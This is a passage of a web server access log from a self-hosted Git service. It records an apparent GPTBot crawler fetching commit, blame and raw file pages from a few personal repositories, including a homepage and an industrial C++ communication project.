2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" +[17/Feb/2026:15:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11864] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" +[17/Feb/2026:15:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" +[17/Feb/2026:15:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=source" [Client 74.7.227.38] [Length 11037] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" +[17/Feb/2026:15:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11280] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" +[17/Feb/2026:15:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" +[17/Feb/2026:15:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" +[17/Feb/2026:15:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11279] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" +[17/Feb/2026:15:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10853] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" +[17/Feb/2026:15:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" +[17/Feb/2026:15:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" +[17/Feb/2026:15:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" +[17/Feb/2026:15:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11038] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15634] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:15:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:15:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15717] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:15:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:15:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18922] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:15:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18922] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:15:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10198] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18911] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:15:09:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11755] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:15:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11755] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:15:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25013] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10411] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13228] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 